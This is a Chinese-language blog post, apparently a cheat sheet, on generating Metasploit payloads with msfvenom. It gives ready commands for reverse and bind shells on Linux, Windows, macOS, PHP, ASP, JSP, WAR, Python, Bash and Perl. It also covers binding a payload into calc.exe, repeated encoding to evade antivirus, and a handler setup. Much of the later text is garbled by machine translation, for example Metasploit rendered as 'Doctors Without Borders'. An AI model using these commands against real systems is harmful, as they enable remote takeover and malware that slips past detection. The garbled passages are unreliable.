&lt;name&gt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; \u6307\u5b9a\u4e00\u4e2a\u81ea\u5b9a\u4e49\u7684\u53d8\u91cf\uff0c\u4ee5\u786e\u5b9a\u8f93\u51fa\u683c\u5f0f<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp; &#8211;shellest&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; \u6700\u5c0f\u5316\u751f\u6210payload<\/p>\n\n\n\n<p>-h, &#8211;help&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; \u67e5\u770b\u5e2e\u52a9\u9009\u9879<\/p>\n\n\n\n<p>&#8211;help-formats&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;\u67e5\u770bmsf\u652f\u6301\u7684\u8f93\u51fa\u683c\u5f0f\u5217\u8868<\/p>\n\n\n\n<p>2.\u751f\u6210payload \u683c\u5f0f\u8bf4\u660e<\/p>\n\n\n\n<p>\uff081\uff09\u751f\u6210\u4e0d\u7ecf\u8fc7\u7f16\u7801\u7684\u666e\u901apayload\uff08\u4e0d\u7f16\u7801-&gt;\u751f\u6210\u5185\u5bb9\u56fa\u5b9a-&gt;\u76f4\u63a5\u88ab\u6740\uff09<\/p>\n\n\n\n<p>#\u683c\u5f0f<\/p>\n\n\n\n<p>msfvenom -p &lt;payload&gt; &lt;payload options&gt; -f &lt;format&gt; -o &lt;path&gt;<\/p>\n\n\n\n<p>#\u5b9e\u4f8b<\/p>\n\n\n\n<p>msfvenom \u2013p windows\/meterpreter\/reverse_tcp \u2013f c \u2013o 1.c<\/p>\n\n\n\n<p>\uff082\uff09\u7ecf\u8fc7\u7f16\u7801\u5668\u5904\u7406\u540e\u751f\u6210payload<\/p>\n\n\n\n<p>#\u683c\u5f0f<\/p>\n\n\n\n<p>msfvenom -p &lt;payload&gt; -e &lt;encoder &gt; -i &lt;encoder times&gt; -n &lt;nopsled&gt; -f &lt;format&gt; -o &lt;path&gt;<\/p>\n\n\n\n<p>#\u5b9e\u4f8b<\/p>\n\n\n\n<p>msfvenom \u2013p windows\/meterpreter\/reverse_tcp \u2013i 3 \u2013e x86\/shikata_ga_nai \u2013f exe \u2013o C:\\back.exe<\/p>\n\n\n\n<p>\uff083\uff09\u6346\u7ed1\u5230\u6b63\u5e38\u6587\u4ef6\u540e\u751f\u6210payload\uff08\u6682\u672a\u6d4b\u8bd5\u662f\u5426\u53ef\u52a0-e\u53c2\u6570\uff09<\/p>\n\n\n\n<p>Msfvenom \u2013p windows\/meterpreter\/reverse_tcp \u2013platform windows \u2013a x86 \u2013x C:\\calc.exe \u2013k \u2013f exe \u2013o C:\\shell.exe<\/p>\n\n\n\n<p>-p [\u6307\u5b9a\u653b\u51fb\u8f7d\u8377\u540d\u79f0]<\/p>\n\n\n\n<p>\u751f\u6210payload\u81f3\u5c11\u9700\u6307\u5b9a-p&nbsp;\u548c -f\uff0c\u9664\u4e86\u81ea\u5e26\u7684\u90a3\u4e9bpayload\u5916\u3002-p -\u53ef\u6307\u5b9a\u81ea\u5b9a\u4e49\u7684payload \uff0c\u5982\uff1a<\/p>\n\n\n\n<p>cat payload_file.bin | msfvenom -p &#8211; -a x86 &#8211;platform win -e x86\/shikata_ga_nai -f raw<\/p>\n\n\n\n<p>#\u6682\u672a\u6d4b\u8bd5<\/p>\n\n\n\n<p>cat 1.exe | msfvenom -p &#8211; -a x86 &#8211;platform win -e x86\/shikata_ga_nai -f exe -o 2.exe<\/p>\n\n\n\n<p>-f [\u6307\u5b9apayload\u7684\u8f93\u51fa\u683c\u5f0f]<\/p>\n\n\n\n<p>\u6309\u9700\u8981\u7684\u683c\u5f0f\u8fdb\u884c\u8f93\u51fa\uff1a<br>\u5341\u516d\u8fdb\u5236hex\u7f16\u7801\u5f62\u5f0f \\x0a\uff0c\u5982\u679c\u7528python\u5199exploit\uff0c\u7528-f python\u5f97\u5230python\u4ee3\u7801\u3002\u5982\u679c\u7528python\u5199exploit\uff0c\u7528-f c\u5f97\u5230c\u4ee3\u7801\u3002\u751f\u6210\u4e00\u4e2aexe\u683c\u5f0f\u7684payload\uff0c\u5982\uff1a<br>msfvenom -p windows\/meterpreter\/bind_tcp -f exe<\/p>\n\n\n\n<p>msf\u652f\u6301\u7684\u8f93\u51fa\u683c\u5f0f<\/p>\n\n\n\n<p>msfvenom &#8211;help-formats<\/p>\n\n\n\n<p>Executable formats<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp; asp, aspx, aspx-exe, axis2, dll, elf, elf-so, exe, exe-only, exe-service, exe-small, hta-psh, jar, jsp, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-cmd, psh-net, psh-reflection, vba, vba-exe, vba-psh, vbs, war<\/p>\n\n\n\n<p>Transform formats<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp; bash, c, csharp, dw, dword, hex, java, js_be, js_le, num, perl, pl, powershell, ps1, py, python, raw, rb, ruby, sh, vbapplication, vbscript<\/p>\n\n\n\n<p>3.options usage<\/p>\n\n\n\n<p>\u67e5\u770b\u652f\u6301\u7684payload\u5217\u8868\uff1a<\/p>\n\n\n\n<p>msfvenom -l payloads<\/p>\n\n\n\n<p>Framework Payloads (486 total)<\/p>\n\n\n\n<p>==============================<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp; NameDescription<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp; &#8212;&#8212;&#8212;&#8212;&#8212;<\/p>\n\n\n\n<p>aix\/ppc\/shell_bind_tcp&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Listen for a connection and spawn a command shell<\/p>\n\n\n\n<p>aix\/ppc\/shell_find_port&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Spawn a shell on an established connection<\/p>\n\n\n\n<p>aix\/ppc\/shell_interact&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Simply execve \/bin\/sh (for inetd programs)<\/p>\n\n\n\n<p>aix\/ppc\/shell_reverse_tcp&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Connect back to attacker and spawn a command shell<\/p>\n\n\n\n<p>android\/meterpreter\/reverse_http&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Run a meterpreter server in Android. Tunnel communication over HTTP<\/p>\n\n\n\n<p>android\/meterpreter\/reverse_https&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Run a meterpreter server in Android. Tunnel communication over HTTPS<\/p>\n\n\n\n<p>android\/meterpreter\/reverse_tcp&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Run a meterpreter server in Android. Connect back stager<\/p>\n\n\n\n<p>android\/meterpreter_reverse_http&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Connect back to attacker and spawn a Meterpreter shell<\/p>\n\n\n\n<p>android\/meterpreter_reverse_https&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Connect back to attacker and spawn a Meterpreter shell<\/p>\n\n\n\n<p>android\/meterpreter_reverse_tcp&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Connect back to the attacker and spawn a Meterpreter shell<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp; &#8230;<\/p>\n\n\n\n<p>\u67e5\u770b\u652f\u6301\u7684\u8f93\u51fa\u6587\u4ef6\u7c7b\u578b\uff1a<\/p>\n\n\n\n<p>msfvenom &#8211;help-formats<\/p>\n\n\n\n<p>\u67e5\u770b\u652f\u6301\u7684\u7f16\u7801\u65b9\u5f0f\uff1a(\u4e3a\u4e86\u8fbe\u5230\u514d\u6740\u7684\u6548\u679c)<\/p>\n\n\n\n<p>msfvenom -l encoders<\/p>\n\n\n\n<p>\u67e5\u770b\u652f\u6301\u7684\u7a7a\u5b57\u6bb5\u6a21\u5757\uff1a(\u4e3a\u4e86\u8fbe\u5230\u514d\u6740\u7684\u6548\u679c)<\/p>\n\n\n\n<p>msfvenom -l nops<\/p>\n\n\n\n<p>4.\u5e38\u7528\u7684payload<\/p>\n\n\n\n<p>1.\u547d\u4ee4\u683c\u5f0f:<\/p>\n\n\n\n<p>msfvenom -p &lt;payload&gt; &lt;payload options&gt; -f &lt;format&gt; -o &lt;path&gt;<\/p>\n\n\n\n<p>Binaries\uff1a<\/p>\n\n\n\n<p>2.Linux:<\/p>\n\n\n\n<p>\u53cd\u5411\u8fde\u63a5<\/p>\n\n\n\n<p>msfvenom -p linux\/x86\/meterpreter\/reverse_tcp LHOST=&lt;Your IP Address&gt; LPORT=&lt;Your Port to Connect On&gt; -f elf &gt; shell.elf<\/p>\n\n\n\n<p>\u6b63\u5411\u8fde\u63a5<\/p>\n\n\n\n<p>msfvenom -p linux\/x86\/meterpreter\/bind_tcp LHOST=&lt;Target IP Address&gt; LPORT=&lt;Your Port to Connect On&gt; -f elf &gt; shell.elf<\/p>\n\n\n\n<p>3.Windows:<\/p>\n\n\n\n<p>msfvenom -p windows\/meterpreter\/reverse_tcp LHOST=&lt;Your IP Address&gt; LPORT=&lt;Your Port to Connect On&gt; -f exe &gt; shell.exe<\/p>\n\n\n\n<p>4.Mac:<\/p>\n\n\n\n<p>msfvenom -p osx\/x86\/shell_reverse_tcp LHOST=&lt;Your IP Address&gt; LPORT=&lt;Your Port to Connect On&gt; -f macho &gt; shell.macho<\/p>\n\n\n\n<p>Web Payloads\uff1a<\/p>\n\n\n\n<p>5.PHP:<\/p>\n\n\n\n<p>msfvenom -p php\/meterpreter_reverse_tcp LHOST=&lt;Your IP Address&gt; LPORT=&lt;Your Port to Connect On&gt; -f raw &gt; shell.php<\/p>\n\n\n\n<p>cat shell.php | pbcopy &amp;&amp; echo &#8216;&lt;?php &#8216; | tr -d &#8216;\\n&#8217; &gt; shell.php &amp;&amp; pbpaste &gt;&gt; shell.php<\/p>\n\n\n\n<p>6.ASP:<\/p>\n\n\n\n<p>msfvenom -p windows\/meterpreter\/reverse_tcp LHOST=&lt;Your IP Address&gt; LPORT=&lt;Your Port to Connect On&gt; -f asp &gt; shell.asp<\/p>\n\n\n\n<p>7.JSP:<\/p>\n\n\n\n<p>msfvenom -p java\/jsp_shell_reverse_tcp LHOST=&lt;Your IP Address&gt; LPORT=&lt;Your Port to Connect On&gt; -f raw &gt; shell.jsp<\/p>\n\n\n\n<p>8.WAR:<\/p>\n\n\n\n<p>msfvenom -p java\/jsp_shell_reverse_tcp LHOST=&lt;Your IP Address&gt; LPORT=&lt;Your Port to Connect On&gt; -f war &gt; shell.wa<\/p>\n\n\n\n<p>Scripting Payloads\uff1a<\/p>\n\n\n\n<p>9.Python:<\/p>\n\n\n\n<p>msfvenom -p cmd\/unix\/reverse_python LHOST=&lt;Your IP Address&gt; LPORT=&lt;Your Port to Connect On&gt; -f raw &gt; shell.py<\/p>\n\n\n\n<p>10.Bash:<\/p>\n\n\n\n<p>msfvenom -p cmd\/unix\/reverse_bash LHOST=&lt;Your IP Address&gt; LPORT=&lt;Your Port to Connect On&gt; -f raw &gt; shell.sh<\/p>\n\n\n\n<p>11.Perl:<\/p>\n\n\n\n<p>msfvenom -p cmd\/unix\/reverse_perl LHOST=&lt;Your IP Address&gt; LPORT=&lt;Your Port to Connect On&gt; -f raw &gt; shell.pl<\/p>\n\n\n\n<p>Shellcode\uff1a<\/p>\n\n\n\n<p>12.Linux Based Shellcode:<\/p>\n\n\n\n<p>msfvenom -p linux\/x86\/meterpreter\/reverse_tcp LHOST=&lt;Your IP Address&gt; LPORT=&lt;Your Port to Connect On&gt; -f &lt;language&gt;<\/p>\n\n\n\n<p>13.Windows Based Shellcode:<\/p>\n\n\n\n<p>msfvenom -p windows\/meterpreter\/reverse_tcp LHOST=&lt;Your IP Address&gt; LPORT=&lt;Your Port to Connect On&gt; -f &lt;language&gt;<\/p>\n\n\n\n<p>14.Mac Based Shellcode:<\/p>\n\n\n\n<p>msfvenom -p osx\/x86\/shell_reverse_tcp LHOST=&lt;Your IP Address&gt; LPORT=&lt;Your Port to Connect On&gt; -f &lt;language&gt;<\/p>\n\n\n\n<p>15.Handlers\uff1a<\/p>\n\n\n\n<p>use exploit\/multi\/handler<\/p>\n\n\n\n<p>&nbsp;&nbsp; set PAYLOAD &lt;Payload name&gt;<\/p>\n\n\n\n<p>&nbsp;&nbsp; set LHOST &lt;LHOST value&gt;<\/p>\n\n\n\n<p>&nbsp;&nbsp; set LPORT &lt;LPORT value&gt;<\/p>\n\n\n\n<p>&nbsp;&nbsp; set ExitOnSession false<\/p>\n\n\n\n<p>&nbsp;&nbsp; exploit -j -z<\/p>\n\n\n\n<p>5.\u751f\u6210\u6709\u6548\u8f7d\u8377\u683c\u5f0f\u8bf4\u660e<\/p>\n\n\n\n<p>\u751f\u6210\u4e0d\u7ecf\u8fc7\u7f16\u7801\u7684\u666e\u901a\u51c0\u8377\uff08\u4e0d\u7f16\u7801&nbsp;&#8211; &gt;\u751f\u6210\u5185\u5bb9\u56fa\u5b9a&nbsp;&#8211; &gt;\u76f4\u63a5\u88ab\u6740\uff09<\/p>\n\n\n\n<p>#\u683c\u5f0f<\/p>\n\n\n\n<p>msfvenom -p &lt;payload&gt; &lt;payload options&gt; -f &lt;format&gt; -o &lt;path&gt;<\/p>\n\n\n\n<p>#\u5b9e\u4f8b<\/p>\n\n\n\n<p>msfvenom \u2013p windows\/meterpreter\/reverse_tcp \u2013f c \u2013o 1.c<\/p>\n\n\n\n<p>\u7ecf\u8fc7\u7f16\u7801\u5668\u5904\u7406\u540e\u751f\u6210\u7684\u6709\u6548\u8f7d\u8377<\/p>\n\n\n\n<p>#\u683c\u5f0f<\/p>\n\n\n\n<p>msfvenom -p &lt;payload&gt; -e &lt;encoder &gt; -i &lt;encoder times&gt; -n &lt;nopsled&gt; -f &lt;format&gt; -o &lt;path&gt;<\/p>\n\n\n\n<p>#\u5b9e\u4f8b<\/p>\n\n\n\n<p>msfvenom \u2013p windows\/meterpreter\/reverse_tcp \u2013i 3 \u2013e x86\/shikata_ga_nai \u2013f exe \u2013o C:\\back.exe<\/p>\n\n\n\n<p>\u6346\u7ed1\u5230\u6b63\u5e38\u6587\u4ef6\u540e\u751f\u6210\u6709\u6548\u8f7d\u8377\uff08\u6682\u672a\u6d4b\u8bd5\u662f\u5426\u53ef\u52a0-e\u53c2\u6570\uff09<\/p>\n\n\n\n<p>Msfvenom \u2013p windows\/meterpreter\/reverse_tcp \u2013platform windows \u2013a x86 \u2013x C:\\calc.exe \u2013k \u2013f exe \u2013o C:\\shell.exe<\/p>\n\n\n\n<p>-p [\u6307\u5b9a\u653b\u51fb\u8f7d\u8377\u540d\u79f0]<\/p>\n\n\n\n<p>\u751f\u6210\u6709\u6548\u8d1f\u8377\u81f3\u5c11\u9700\u6307\u5b9a-p\u548c-f<\/p>\n\n\n\n<p>\u9664\u4e86\u81ea\u5e26\u7684\u90a3\u4e9b\u6709\u6548\u8f7d\u8377\u5916<br>-p -\u53ef\u6307\u5b9a\u81ea\u5b9a\u4e49\u7684\u6709\u6548\u8f7d\u8377\uff0c\u5982\uff1a<\/p>\n\n\n\n<p>cat payload_file.bin | msfvenom -p &#8211; -a x86 &#8211;platform win -e x86\/shikata_ga_nai -f raw<\/p>\n\n\n\n<p>#\u6682\u672a\u6d4b\u8bd5<\/p>\n\n\n\n<p>cat 1.exe | msfvenom -p &#8211; -a x86 &#8211;platform win -e x86\/shikata_ga_nai -f exe -o 2.exe<\/p>\n\n\n\n<p>-f [\u6307\u5b9a\u6709\u6548\u8f7d\u8377\u7684\u8f93\u51fa\u683c\u5f0f]<\/p>\n\n\n\n<p>\u6309\u9700\u8981\u7684\u683c\u5f0f\u8fdb\u884c\u8f93\u51fa\uff1a<br>\u5341\u516d\u8fdb\u5236\u5341\u516d\u8fdb\u5236\u5f62\u5f0f\u7f16\u7801\\x0a<br>\u5982\u679c\u7528\u87d2\u5199\u5229\u7528\uff0c\u7528-f python\u5f97\u5230\u87d2\u4ee3\u7801\u3002<br>\u5982\u679c\u7528\u87d2\u5199\u5229\u7528\uff0c\u7528-f c\u5f97\u5230\u00c7\u4ee3\u7801\u3002<\/p>\n\n\n\n<p>\u751f\u6210\u4e00\u4e2aEXE\u683c\u5f0f\u7684\u6709\u6548\u8f7d\u8377\uff0c\u5982\uff1a<br>msfvenom -p windows\/meterpreter\/bind_tcp -f exe<\/p>\n\n\n\n<p>\u65e0\u56fd\u754c\u533b\u751f\u652f\u6301\u7684\u8f93\u51fa\u683c\u5f0f<\/p>\n\n\n\n<p>msfvenom &#8211;help-formats<\/p>\n\n\n\n<p>Executable formats<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp; asp, aspx, aspx-exe, axis2, dll, elf, elf-so, exe, exe-only, exe-service, exe-small, hta-psh, jar, jsp, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-cmd, psh-net, psh-reflection, vba, vba-exe, vba-psh, vbs, war<\/p>\n\n\n\n<p>Transform formats<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp; bash, c, csharp, dw, dword, hex, java, js_be, js_le, num, perl, pl, powershell, ps1, py, python, raw, rb, ruby, sh, vbapplication, vbscript<\/p>\n\n\n\n<p>&#8211; \u4e00\u4e2ax64<\/p>\n\n\n\n<p>-a x86&nbsp;<br>-a x86_64<\/p>\n\n\n\n<p>msfvenom -p windows\/meterpreter\/bind_tcp &#8211;help-platform<\/p>\n\n\n\n<p>Platforms<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp; aix, android, bsd, bsdi, cisco, firefox, freebsd, hardware, hpux, irix, java, javascript, linux, mainframe, multi, netbsd, netware, nodejs, openbsd, osx, php, python, ruby, solaris, unix, windows<\/p>\n\n\n\n<p>-a\u4e0d\u6307\u5b9a\u4e5f\u53ef\u4ee5\uff0c\u53ef\u5728-p\u540e\u7684\u6709\u6548\u8f7d\u8377\u540d\u79f0\u4e2d\u660e\u786e\u6307\u5b9a\u7684\u5efa\u7b51\uff0c\u5982\uff1a<\/p>\n\n\n\n<p>msfvenom -p linux\/x86\/exec CMD=\/bin\/sh<\/p>\n\n\n\n<p>\u6b64\u6709\u6548\u8f7d\u8377\u6307\u5b9a\u4e86\u53c2\u6570CMD&nbsp;<br>\u67e5\u770b\u67d0\u4e2a\u6709\u6548\u8f7d\u8377\u5177\u4f53\u9700\u8981\u54ea\u4e9b\u53c2\u6570\uff08\u5fc5\u9700\u662f\u662f\u5219\u5fc5\u9700\u8be5\u53c2\u6570\uff09<br>msfvenom -p linux\/x86\/exec &#8211;payload-options<\/p>\n\n\n\n<p>\u5bf9\u6709\u6548\u8f7d\u8377\u8fdb\u884c\u7f16\u7801<\/p>\n\n\n\n<p>1.\u89c4\u907f\u7279\u6b8a\u5b57\u7b26-b&#8217;\/ x00\u4e00\u4e2a\u7279\u6b8a\u5b57\u7b26\u5217\u8868&#8217;<\/p>\n\n\n\n<p>\u65e0\u56fd\u754c\u533b\u751f\u4f1a\u81ea\u52a8\u627e\u4e00\u4e2a\u5408\u9002\u7684\u7f16\u7801\u5668\u89c4\u907f\u6709\u6548\u8f7d\u8377\u4e2d\u7684\u8fd9\u4e9b\u201c\u574f\u5b57\u7b26\u201d\uff1a<br>msfvenom -p windows\/meterpreter\/bind_tcp -b &#8216;\\x00&#8217; -f raw<\/p>\n\n\n\n<p>Found 10 compatible encoders<\/p>\n\n\n\n<p>Attempting to encode payload with 1 iterations of x86\/shikata_ga_nai<\/p>\n\n\n\n<p>\u4e0d\u540c\u7684\u51fd\u6570\uff0c\u6709\u4e0d\u540c\u7684\u89c4\u907f\u5b57\u7b26\uff1a<br>\u5982\u83b7\u53d6\u9700\u8981\u5c31\u907f\u514d\/x0a<br>\u5982scanf\u51fd\u6570\u66f4\u4e25\u683c\uff0c\u7a7a\u767d\u4e0d\u5141\u8bb8\u7b26<br>\u5982\u4ea7\u751f\u4e00\u6bb5\u9ad8\u7ba1\u7684shellcode\u7684<\/p>\n\n\n\n<p>2.\u7528-e\u9009\u9879\u6307\u5b9a\u7f16\u7801\u5668\u7684\u7f16\u7801\u5668\uff0c\u5982\uff1a<\/p>\n\n\n\n<p>msfvenom -p windows\/meterpreter\/bind_tcp -e x86\/shikata_ga_nai -f raw<\/p>\n\n\n\n<p>\u9ed8\u8ba4\u7684\u8f93\u51fa\u683c\u5f0f\u662f\u539f\u59cb\u7684\uff0c\u76f4\u63a5\u8f93\u51fa\u6709\u6548\u8f7d\u8377\u7684\u5b57\u7b26\uff08\u542b\u4e71\u7801\uff09\uff0c\u5e38\u52a0\u53c2\u6570-o\u5199\u5230\u6587\u4ef6\u4e2d\u3002<\/p>\n\n\n\n<p>3.\u4f7f\u7528-i\u8fdb\u884c\u9009\u9879\u5bf9\u8bdd\u591a\u6b21\u7f16\u7801<br>\u8fed\u4ee3\u7f16\u7801\u4e5f\u8bb8\u4f1a\u6709\u89c4\u907f\u6740\u6bd2\u8f6f\u4ef6\u7684\u4f5c\u7528\u82f1\u6587\uff0c\u4f46\u8fd9\u4e0d\u662f\u771f\u6b63\u7684\u514d\u6740\u3002<\/p>\n\n\n\n<p>\u8fed\u4ee3\u7f16\u7801\u4f8b\u5b50\uff1a<br>msfvenom -p windows\/meterpreter\/bind_tcp -e x86\/shikata_ga_nai -i 3<\/p>\n\n\n\n<p>\u65e0\u56fd\u754c\u533b\u751f\u7ec4\u7ec7\u4e2d\u6240\u6709\u7684\u7f16\u7801\u5668\uff1a<\/p>\n\n\n\n<p>msfvenom -l encoders<\/p>\n\n\n\n<p>Framework Encoders<\/p>\n\n\n\n<p>==================<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp; Name&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Rank&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Description<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp; &#8212;-&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &#8212;-&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &#8212;&#8212;&#8212;&#8211;<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp; cmd\/echo&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; good&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Echo Command Encoder<\/p>\n\n\n\n<p>cmd\/generic_shmanual&nbsp;&nbsp;&nbsp;&nbsp; Generic Shell Variable Substitution Command Encoder<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp; cmd\/ifs&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; low&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Generic ${IFS} Substitution Command Encoder<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp; cmd\/perl&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; normal&nbsp;&nbsp;&nbsp;&nbsp; Perl Command Encoder<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp; cmd\/powershell_base64&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; excellent&nbsp; Powershell Base64 Command Encoder<\/p>\n\n\n\n<p>cmd\/printf_php_mqmanual&nbsp;&nbsp;&nbsp;&nbsp; printf(1) via PHP magic_quotes Utility Command Encoder<\/p>\n\n\n\n<p>generic\/eicarmanual&nbsp;&nbsp;&nbsp;&nbsp; The EICAR Encoder<\/p>\n\n\n\n<p>generic\/none&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;normal&nbsp;&nbsp;&nbsp;&nbsp; The &#8220;none&#8221; Encoder<\/p>\n\n\n\n<p>mipsbe\/byte_xorinormal&nbsp;&nbsp;&nbsp;&nbsp; Byte XORi Encoder<\/p>\n\n\n\n<p>mipsbe\/longxornormal&nbsp;&nbsp;&nbsp;&nbsp; XOR Encoder<\/p>\n\n\n\n<p>mipsle\/byte_xorinormal&nbsp;&nbsp;&nbsp;&nbsp; Byte XORi Encoder<\/p>\n\n\n\n<p>mipsle\/longxor&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;normal&nbsp;&nbsp;&nbsp;&nbsp; XOR Encoder<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp; php\/base64&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; great&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; PHP Base64 Encoder<\/p>\n\n\n\n<p>ppc\/longxornormal&nbsp;&nbsp;&nbsp;&nbsp; PPC LongXOR Encoder<\/p>\n\n\n\n<p>ppc\/longxor_tagnormal&nbsp;&nbsp;&nbsp;&nbsp; PPC LongXOR Encoder<\/p>\n\n\n\n<p>sparc\/longxor_tag&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;normalSPARC DWORD XOR Encoder<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp; x64\/xor&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; normal&nbsp;&nbsp;&nbsp;&nbsp; XOR Encoder<\/p>\n\n\n\n<p>x64\/zutto_dekirumanual&nbsp;&nbsp;&nbsp;&nbsp; Zutto Dekiru<\/p>\n\n\n\n<p>x86\/add_submanual&nbsp;&nbsp;&nbsp;&nbsp; Add\/Sub Encoder<\/p>\n\n\n\n<p>x86\/alpha_mixedlow&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;Alpha2 Alphanumeric Mixedcase 